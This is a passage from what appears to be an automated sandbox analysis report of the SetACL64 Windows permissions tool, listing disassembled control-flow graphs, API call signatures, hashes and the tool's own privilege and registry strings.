FreeLibraryAndExitThread 43202->43204 43203->43202 43204->43198 43206 7ff697084002 43205->43206 43207 7ff697084007 43205->43207 43229 7ff697087e14 6 API calls try_get_function 43206->43229 43208 7ff697087e5c _Toupper 6 API calls 43207->43208 43213 7ff69708400f SetLastError 43207->43213 43210 7ff69708402a 43208->43210 43212 7ff697084fdc _Toupper 12 API calls 43210->43212 43210->43213 43214 7ff69708403d 43212->43214 43213->43200 43215 7ff69708405b 43214->43215 43216 7ff69708404b 43214->43216 43218 7ff697087e5c _Toupper 6 API calls 43215->43218 43217 7ff697087e5c _Toupper 6 API calls 43216->43217 43219 7ff697084052 43217->43219 43220 7ff697084063 43218->43220 43225 7ff697085054 __free_lconv_mon 12 API calls 43219->43225 43221 7ff697084079 43220->43221 43222 7ff697084067 43220->43222 43230 7ff697083c14 14 API calls _Toupper 43221->43230 43223 7ff697087e5c _Toupper 6 API calls 43222->43223 43223->43219 43225->43213 43226 7ff697084081 43227 7ff697085054 __free_lconv_mon 12 API calls 43226->43227 43227->43213 43228->43199 43230->43226
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
                              • String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                              • API String ID: 3366768055-1688761767
                              • Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                              • Instruction ID: 6306c4e6f850d7b91ce2ac49f02d2e4c551307b0e80ea8e51162b42812bedbc9
                              • Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                              • Instruction Fuzzy Hash: BA33AEB2A1978285EB708F26E8447AD23A1FB44BD8F405676DA5DC7BD9DF38E584C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
                              • String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                              • API String ID: 2754268630-3593729730
                              • Opcode ID: 85943aa65972b4427093ec2e370a72c4f5bc068b0337142737c3b556697a55eb
                              • Instruction ID: 69d1622c9f0a6c6696e0a30b9ad2c771be3585696a72fccb967d08fa1276331f
                              • Opcode Fuzzy Hash: 85943aa65972b4427093ec2e370a72c4f5bc068b0337142737c3b556697a55eb
                              • Instruction Fuzzy Hash: C5F2C2A2B09B5285EF20DB66E4442BD27A1FB84BC8F444176DA4ED77A9EF7CE444C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
                              • String ID: SeSecurityPrivilege
                              • API String ID: 3247214862-2333288578
                              • Opcode ID: 229e38693b3d67cb55a7457fbf6a30184df57e283c32ee218c02f652205318e6
                              • Instruction ID: 7f81a0bd94d3ac2e8c6de0b894709dc50018673b6a1b9435382beca14188fb49
                              • Opcode Fuzzy Hash: 229e38693b3d67cb55a7457fbf6a30184df57e283c32ee218c02f652205318e6
                              • Instruction Fuzzy Hash: 0942AFA2B19B4286FB249B25D4643AD33A2FB84BC8F405275DA4CD7B99DF7CE590C340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2411 7ff697053a5e-7ff697053a8e AdjustTokenPrivileges 2412 7ff697053aa9-7ff697053abc GetLastError CloseHandle 2411->2412 2413 7ff697053a90-7ff697053a98 GetLastError 2411->2413 2415 7ff697053abd-7ff697053ac6 2412->2415 2413->2412 2414 7ff697053a9a-7ff697053aa7 CloseHandle 2413->2414 2414->2415 2416 7ff697053ac8-7ff697053adf 2415->2416 2417 7ff697053aff-7ff697053b1b 2415->2417 2418 7ff697053afa call 7ff6970721a0 2416->2418 2419 7ff697053ae1-7ff697053af4 2416->2419 2420 7ff697053b1d-7ff697053b34 2417->2420 2421 7ff697053b54-7ff697053b56 2417->2421 2418->2417 2419->2418 2424 7ff6970543fb-7ff697054400 call 7ff6970788fc 2419->2424 2426 7ff697053b36-7ff697053b49 2420->2426 2427 7ff697053b4f call 7ff6970721a0 2420->2427 2422 7ff697053b5c-7ff697053be2 call 7ff697043f80 * 2 call 7ff69704d260 2421->2422 2423 7ff697053c5e-7ff697053d83 call 7ff697043f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2421->2423 2450 7ff697053c1c-7ff697053c25 2422->2450 2451 7ff697053be4-7ff697053bfb 2422->2451 2452 7ff697053dbc-7ff697053dd8 2423->2452 2453 7ff697053d85-7ff697053d9c 2423->2453 2430 7ff697054401-7ff697054406 call 7ff6970788fc 2424->2430 2426->2427 2426->2430 2427->2421 2440 7ff697054407-7ff69705440c call 7ff6970788fc 2430->2440 2449 7ff69705440d-7ff697054412 call 7ff6970788fc 2440->2449 2473 7ff697054413-7ff697054418 call 7ff6970788fc 2449->2473 2450->2423 2461 7ff697053c27-7ff697053c3e 2450->2461 2457 7ff697053bfd-7ff697053c10 2451->2457 2458 7ff697053c16-7ff697053c1b call 7ff6970721a0 2451->2458 2454 7ff697053dda-7ff697053df1 2452->2454 2455 7ff697053e11-7ff697053e13 2452->2455 2459 7ff697053db7 call 7ff6970721a0 2453->2459 2460 7ff697053d9e-7ff697053db1 2453->2460 2462 7ff697053e0c call 7ff6970721a0 2454->2462 2463 7ff697053df3-7ff697053e06 2454->2463 2464 7ff697053f1b-7ff697054040 call 7ff697043f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2455->2464 2465 7ff697053e19-7ff697053e9f call 7ff697043f80 * 2 call 7ff69704d260 2455->2465 2457->2440 2457->2458 2458->2450 2459->2452 2460->2449 2460->2459 2469 7ff697053c59 call 7ff6970721a0 2461->2469 2470 7ff697053c40-7ff697053c53 2461->2470 2462->2455 2463->2462 2463->2473 2500 7ff697054079-7ff697054095 2464->2500 2501 7ff697054042-7ff697054059 2464->2501 2502 7ff697053ed9-7ff697053ee2 2465->2502 2503 7ff697053ea1-7ff697053eb8 2465->2503 2469->2423 2470->2469 2471 7ff6970543dd-7ff6970543fa call 7ff6970788fc * 5 2470->2471 2471->2424 2489 7ff697054419-7ff69705441e call 7ff6970788fc 2473->2489 2498 7ff69705441f-7ff697054424 call 7ff6970788fc 2489->2498 2524 7ff697054425-7ff69705442a call 7ff6970788fc 2498->2524 2511 7ff697054097-7ff6970540ae 2500->2511 2512 7ff6970540ce-7ff6970540d0 2500->2512 2507 7ff69705405b-7ff69705406e 2501->2507 2508 7ff697054074 call 7ff6970721a0 2501->2508 2502->2464 2505 7ff697053ee4-7ff697053efb 2502->2505 2509 7ff697053eba-7ff697053ecd 2503->2509 2510 7ff697053ed3-7ff697053ed8 call 7ff6970721a0 2503->2510 2514 7ff697053efd-7ff697053f10 2505->2514 2515 7ff697053f16 call 7ff6970721a0 2505->2515 2507->2498 2507->2508 2508->2500 2509->2489 2509->2510 2510->2502 2521 7ff6970540c9 call 7ff6970721a0 2511->2521 2522 7ff6970540b0-7ff6970540c3 2511->2522 2516 7ff6970540d6-7ff69705415c call 7ff697043f80 * 2 call 7ff69704d260 2512->2516 2517 7ff6970541d8-7ff697054209 2512->2517 2514->2471 2514->2515 2515->2464 2575 7ff697054196-7ff69705419f 2516->2575 2576 7ff69705415e-7ff697054175 2516->2576 2528 7ff69705420b-7ff69705420e 2517->2528 2529 7ff697054268-7ff697054294 2517->2529 2521->2512 2522->2521 2522->2524 2545 7ff69705442b-7ff697054430 call 7ff6970788fc 2524->2545 2533 7ff697054210-7ff697054220 2528->2533 2535 7ff697054296-7ff697054299 2529->2535 2536 7ff697054314-7ff697054320 2529->2536 2539 7ff697054239-7ff697054266 2533->2539 2540 7ff697054222-7ff697054233 call 7ff69706e4b0 2533->2540 2544 7ff6970542a0-7ff6970542b4 2535->2544 2541 7ff697054322-7ff69705432c call 7ff69706e4b0 2536->2541 2542 7ff697054335-7ff697054341 2536->2542 2539->2529 2539->2533 2540->2539 2569 7ff697054356-7ff69705435b 2540->2569 2560 7ff697054331-7ff697054333 2541->2560 2549 7ff69705435d-7ff697054367 call 7ff697054810 2542->2549 2550 7ff697054343-7ff697054354 call 7ff69706e4b0 2542->2550 2552 7ff6970542cd-7ff6970542d2 2544->2552 2553 7ff6970542b6-7ff6970542c7 call 7ff69706e4b0 2544->2553 2572 7ff697054369-7ff697054372 2549->2572 2573 7ff6970543b1-7ff6970543dc call 7ff697072180 2549->2573 2550->2549 2550->2569 2555 7ff6970542ea-7ff697054312 2552->2555 2556 7ff6970542d4-7ff6970542e8 call 7ff69706e4b0 2552->2556 2553->2552 2553->2569 2555->2536 2555->2544 2556->2555 2556->2569 2560->2542 2560->2569 2569->2573 2578 7ff697054374-7ff697054396 call 7ff69705a350 2572->2578 2579 7ff69705439e-7ff6970543a1 2572->2579 2575->2517 2577 7ff6970541a1-7ff6970541b8 2575->2577 2580 7ff697054177-7ff69705418a 2576->2580 2581 7ff697054190-7ff697054195 call 7ff6970721a0 2576->2581 2583 7ff6970541ba-7ff6970541cd 2577->2583 2584 7ff6970541d3 call 7ff6970721a0 2577->2584 2578->2573 2594 7ff697054398 2578->2594 2586 7ff6970543a3-7ff6970543aa call 7ff69706b2b0 2579->2586 2587 7ff6970543af 2579->2587 2580->2545 2580->2581 2581->2575 2583->2471 2583->2584 2584->2517 2586->2587 2587->2573 2594->2579
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                              • API String ID: 637398405-1541018277
                              • Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                              • Instruction ID: 4c89f5db6292328e632d4a181857805162a15b7f3fc1d2530693f7eb65f79159
                              • Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                              • Instruction Fuzzy Hash: 862274B2B1878281EE248B65F4443A9A761FB847E4F505235EA9DC3BE9DF7CE084C700

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2595 7ff69706e4b0-7ff69706e4f4 2596 7ff69706e4f6-7ff69706e4fb call 7ff69707d6ac 2595->2596 2597 7ff69706e4ff-7ff69706e507 2595->2597 2596->2597 2599 7ff69706e50c-7ff69706e519 ConvertStringSidToSidW 2597->2599 2600 7ff69706e509 2597->2600 2601 7ff69706e53b-7ff69706e574 2599->2601 2602 7ff69706e51b-7ff69706e536 call 7ff69706ec20 LocalFree 2599->2602 2600->2599 2605 7ff69706e579-7ff69706e583 2601->2605 2606 7ff69706e576 2601->2606 2610 7ff69706ebc8-7ff69706ebee call 7ff697072180 2602->2610 2608 7ff69706e6fd-7ff69706e708 call 7ff69706f9c0 2605->2608 2609 7ff69706e589-7ff69706e597 2605->2609 2606->2605 2619 7ff69706e70a-7ff69706e71c 2608->2619 2620 7ff69706e720-7ff69706e762 call 7ff697043f80 call 7ff697044750 2608->2620 2612 7ff69706e599 2609->2612 2613 7ff69706e5b3 2609->2613 2616 7ff69706e5a0-7ff69706e5a4 2612->2616 2617 7ff69706e5b6-7ff69706e5b9 2613->2617 2616->2617 2621 7ff69706e5a6-7ff69706e5b1 2616->2621 2617->2608 2622 7ff69706e5bf-7ff69706e5c8 2617->2622 2619->2620 2641 7ff69706e79a-7ff69706e7b0 2620->2641 2642 7ff69706e764-7ff69706e77a 2620->2642 2621->2613 2621->2616 2622->2608 2624 7ff69706e5ce-7ff69706e5d5 2622->2624 2626 7ff69706e5d7-7ff69706e5dc 2624->2626 2627 7ff69706e5e1-7ff69706e602 2624->2627 2628 7ff69706eb3d-7ff69706eb41 2626->2628 2629 7ff69706e607-7ff69706e618 call 7ff697043f80 2627->2629 2630 7ff69706e604 2627->2630 2633 7ff69706eb7d-7ff69706eb92 2628->2633 2634 7ff69706eb43-7ff69706eb59 2628->2634 2645 7ff69706e61a-7ff69706e630 2629->2645 2646 7ff69706e650-7ff69706e67a 2629->2646 2630->2629 2639 7ff69706ebc6 2633->2639 2640 7ff69706eb94-7ff69706ebaa 2633->2640 2637 7ff69706eb5b-7ff69706eb6e 2634->2637 2638 7ff69706eb74-7ff69706eb79 call 7ff6970721a0 2634->2638 2637->2638 2647 7ff69706ec19-7ff69706ec1f call 7ff6970788fc 2637->2647 2638->2633 2639->2610 2649 7ff69706ebac-7ff69706ebbf 2640->2649 2650 7ff69706ebc1 call 7ff6970721a0 2640->2650 2643 7ff69706e7f2 2641->2643 2644 7ff69706e7b2-7ff69706e7eb call 7ff697070c18 call 7ff697045cf0 2641->2644 2651 7ff69706e77c-7ff69706e78f 2642->2651 2652 7ff69706e795 call 7ff6970721a0 2642->2652 2661 7ff69706e7f6 2643->2661 2644->2661 2706 7ff69706e7ed-7ff69706e7f0 2644->2706 2655 7ff69706e64b call 7ff6970721a0 2645->2655 2656 7ff69706e632-7ff69706e645 2645->2656 2659 7ff69706ebf5-7ff69706ebfa call 7ff697039910 2646->2659 2660 7ff69706e680-7ff69706e695 2646->2660 2649->2650 2662 7ff69706ebef-7ff69706ebf4 call 7ff6970788fc 2649->2662 2650->2639 2651->2652 2664 7ff69706ebfb-7ff69706ec00 call 7ff6970788fc 2651->2664 2652->2641 2655->2646 2656->2655 2667 7ff69706ec13-7ff69706ec18 call 7ff6970788fc 2656->2667 2659->2664 2672 7ff69706e69a-7ff69706e6b5 call 7ff697043f80 2660->2672 2673 7ff69706e697 2660->2673 2674 7ff69706e7f9-7ff69706e7fd 2661->2674 2662->2659 2686 7ff69706ec01-7ff69706ec06 call 7ff6970788fc 2664->2686 2667->2647 2693 7ff69706e6ed-7ff69706e6f9 2672->2693 2694 7ff69706e6b7-7ff69706e6cd 2672->2694 2673->2672 2680 7ff69706e823-7ff69706e826 2674->2680 2681 7ff69706e7ff-7ff69706e802 2674->2681 2682 7ff69706e82c-7ff69706e875 call 7ff697039520 * 2 2680->2682 2683 7ff69706e9c4 2680->2683 2681->2680 2688 7ff69706e804-7ff69706e810 2681->2688 2713 7ff69706e87a-7ff69706e89c DsGetDcNameW 2682->2713 2714 7ff69706e877 2682->2714 2690 7ff69706e9c7-7ff69706e9ea call 7ff69706f3c0 2683->2690 2707 7ff69706ec07-7ff69706ec0c call 7ff6970788fc 2686->2707 2688->2680 2702 7ff69706e812-7ff69706e81d 2688->2702 2705 7ff69706e9ef-7ff69706e9f5 2690->2705 2693->2608 2695 7ff69706e6e8 call 7ff6970721a0 2694->2695 2696 7ff69706e6cf-7ff69706e6e2 2694->2696 2695->2693 2696->2667 2696->2695 2702->2680 2710 7ff69706e9fb-7ff69706ea00 2705->2710 2711 7ff69706eaa3-7ff69706eaab 2705->2711 2706->2674 2719 7ff69706ec0d-7ff69706ec12 call 7ff6970788fc 2707->2719 2717 7ff69706ea1d-7ff69706ea22 2710->2717 2718 7ff69706ea02-7ff69706ea18 call 7ff69706f3c0 2710->2718 2715 7ff69706eaad-7ff69706eac3 2711->2715 2716 7ff69706eae4-7ff69706eaec 2711->2716 2722 7ff69706e912-7ff69706e91a 2713->2722 2723 7ff69706e89e-7ff69706e8a3 2713->2723 2714->2713 2720 7ff69706eac5-7ff69706ead8 2715->2720 2721 7ff69706eade-7ff69706eae3 call 7ff6970721a0 2715->2721 2726 7ff69706eb24-7ff69706eb39 2716->2726 2727 7ff69706eaee-7ff69706eb04 2716->2727 2717->2711 2725 7ff69706ea24-7ff69706ea6a call 7ff697043f80 call 7ff69706f3c0 2717->2725 2718->2711 2719->2667 2720->2719 2720->2721 2721->2716 2731 7ff69706e91c-7ff69706e92e 2722->2731 2732 7ff69706e951-7ff69706e964 2722->2732 2734 7ff69706e8a6-7ff69706e8ae 2723->2734 2725->2711 2759 7ff69706ea6c-7ff69706ea82 2725->2759 2726->2628 2728 7ff69706eb06-7ff69706eb19 2727->2728 2729 7ff69706eb1f call 7ff6970721a0 2727->2729 2728->2667 2728->2729 2729->2726 2740 7ff69706e94c call 7ff6970721a0 2731->2740 2741 7ff69706e930-7ff69706e943 2731->2741 2742 7ff69706e966-7ff69706e981 call 7ff697043f80 2732->2742 2743 7ff69706e982-7ff69706e98a 2732->2743 2734->2734 2745 7ff69706e8b0-7ff69706e909 call 7ff697043f80 call 7ff69703fe30 call 7ff69704eaf0 2734->2745 2740->2732 2741->2686 2748 7ff69706e949 2741->2748 2742->2743 2743->2690 2746 7ff69706e98c-7ff69706e9a2 2743->2746 2745->2722 2768 7ff69706e90b-7ff69706e911 NetApiBufferFree 2745->2768 2752 7ff69706e9bd-7ff69706e9c2 call 7ff6970721a0 2746->2752 2753 7ff69706e9a4-7ff69706e9b7 2746->2753 2748->2740 2752->2690 2753->2719 2753->2752 2762 7ff69706ea9d-7ff69706eaa2 call 7ff6970721a0 2759->2762 2763 7ff69706ea84-7ff69706ea97 2759->2763 2762->2711 2763->2707 2763->2762 2768->2722
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
                              • String ID: computername
                              • API String ID: 1703289946-1800712684
                              • Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                              • Instruction ID: 6f0c5b91ab227f018d887acecc5ba293cab06b2cf846fc49f35c31cc1162bac4
                              • Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                              • Instruction Fuzzy Hash: DA229CA2B14B5285EB208BA8D8583AD37B1FB40BD8F405675DE5DD7AD9EF38E581C300

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2769 7ff697053d1b-7ff697053d4b AdjustTokenPrivileges 2770 7ff697053d4d-7ff697053d55 GetLastError 2769->2770 2771 7ff697053d66-7ff697053d79 GetLastError CloseHandle 2769->2771 2770->2771 2772 7ff697053d57-7ff697053d64 CloseHandle 2770->2772 2773 7ff697053d7a-7ff697053d83 2771->2773 2772->2773 2774 7ff697053dbc-7ff697053dd8 2773->2774 2775 7ff697053d85-7ff697053d9c 2773->2775 2776 7ff697053dda-7ff697053df1 2774->2776 2777 7ff697053e11-7ff697053e13 2774->2777 2778 7ff697053db7 call 7ff6970721a0 2775->2778 2779 7ff697053d9e-7ff697053db1 2775->2779 2780 7ff697053e0c call 7ff6970721a0 2776->2780 2781 7ff697053df3-7ff697053e06 2776->2781 2782 7ff697053f1b-7ff697054040 call 7ff697043f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2777->2782 2783 7ff697053e19-7ff697053e9f call 7ff697043f80 * 2 call 7ff69704d260 2777->2783 2778->2774 2779->2778 2784 7ff69705440d-7ff697054412 call 7ff6970788fc 2779->2784 2780->2777 2781->2780 2786 7ff697054413-7ff697054418 call 7ff6970788fc 2781->2786 2808 7ff697054079-7ff697054095 2782->2808 2809 7ff697054042-7ff697054059 2782->2809 2810 7ff697053ed9-7ff697053ee2 2783->2810 2811 7ff697053ea1-7ff697053eb8 2783->2811 2784->2786 2800 7ff697054419-7ff69705441e call 7ff6970788fc 2786->2800 2807 7ff69705441f-7ff697054424 call 7ff6970788fc 2800->2807 2830 7ff697054425-7ff69705442a call 7ff6970788fc 2807->2830 2818 7ff697054097-7ff6970540ae 2808->2818 2819 7ff6970540ce-7ff6970540d0 2808->2819 2814 7ff69705405b-7ff69705406e 2809->2814 2815 7ff697054074 call 7ff6970721a0 2809->2815 2810->2782 2813 7ff697053ee4-7ff697053efb 2810->2813 2816 7ff697053eba-7ff697053ecd 2811->2816 2817 7ff697053ed3-7ff697053ed8 call 7ff6970721a0 2811->2817 2821 7ff697053efd-7ff697053f10 2813->2821 2822 7ff697053f16 call 7ff6970721a0 2813->2822 2814->2807 2814->2815 2815->2808 2816->2800 2816->2817 2817->2810 2827 7ff6970540c9 call 7ff6970721a0 2818->2827 2828 7ff6970540b0-7ff6970540c3 2818->2828 2823 7ff6970540d6-7ff69705415c call 7ff697043f80 * 2 call 7ff69704d260 2819->2823 2824 7ff6970541d8-7ff697054209 2819->2824 2821->2822 2832 7ff6970543dd-7ff69705440c call 7ff6970788fc * 8 2821->2832 2822->2782 2882 7ff697054196-7ff69705419f 2823->2882 2883 7ff69705415e-7ff697054175 2823->2883 2835 7ff69705420b-7ff69705420e 2824->2835 2836 7ff697054268-7ff697054294 2824->2836 2827->2819 2828->2827 2828->2830 2852 7ff69705442b-7ff697054430 call 7ff6970788fc 2830->2852 2832->2784 2840 7ff697054210-7ff697054220 2835->2840 2841 7ff697054296-7ff697054299 2836->2841 2842 7ff697054314-7ff697054320 2836->2842 2846 7ff697054239-7ff697054266 2840->2846 2847 7ff697054222-7ff697054233 call 7ff69706e4b0 2840->2847 2850 7ff6970542a0-7ff6970542b4 2841->2850 2848 7ff697054322-7ff69705432c call 7ff69706e4b0 2842->2848 2849 7ff697054335-7ff697054341 2842->2849 2846->2836 2846->2840 2847->2846 2876 7ff697054356-7ff69705435b 2847->2876 2867 7ff697054331-7ff697054333 2848->2867 2856 7ff69705435d-7ff697054367 call 7ff697054810 2849->2856 2857 7ff697054343-7ff697054354 call 7ff69706e4b0 2849->2857 2858 7ff6970542cd-7ff6970542d2 2850->2858 2859 7ff6970542b6-7ff6970542c7 call 7ff69706e4b0 2850->2859 2878 7ff697054369-7ff697054372 2856->2878 2879 7ff6970543b1-7ff6970543dc call 7ff697072180 2856->2879 2857->2856 2857->2876 2861 7ff6970542ea-7ff697054312 2858->2861 2862 7ff6970542d4-7ff6970542e8 call 7ff69706e4b0 2858->2862 2859->2858 2859->2876 2861->2842 2861->2850 2862->2861 2862->2876 2867->2849 2867->2876 2876->2879 2885 7ff697054374-7ff697054396 call 7ff69705a350 2878->2885 2886 7ff69705439e-7ff6970543a1 2878->2886 2882->2824 2884 7ff6970541a1-7ff6970541b8 2882->2884 2888 7ff697054177-7ff69705418a 2883->2888 2889 7ff697054190-7ff697054195 call 7ff6970721a0 2883->2889 2891 7ff6970541ba-7ff6970541cd 2884->2891 2892 7ff6970541d3 call 7ff6970721a0 2884->2892 2885->2879 2904 7ff697054398 2885->2904 2895 7ff6970543a3-7ff6970543aa call 7ff69706b2b0 2886->2895 2896 7ff6970543af 2886->2896 2888->2852 2888->2889 2889->2882 2891->2832 2891->2892 2892->2824 2895->2896 2896->2879 2904->2886
                              APIs
                              Strings
                              • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053E37
                              • Prepare, xrefs: 00007FF697053E67, 00007FF697054124
                              • SeTakeOwnershipPrivilege, xrefs: 00007FF697053F39
                              • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
                              • API String ID: 637398405-1701055250
                              • Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                              • Instruction ID: aebdf65cfef575b8a6928bf485d928afea3b4c6f5fd1b9adbad9847ecb2eb339
                              • Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                              • Instruction Fuzzy Hash: 8DE160B2B1878281EE248B65F4443A9A361FB947E4F505235EA5DC7BE8DFBCE184C700

                              Control-flow Graph

                              • Executed
                              • Not Executed
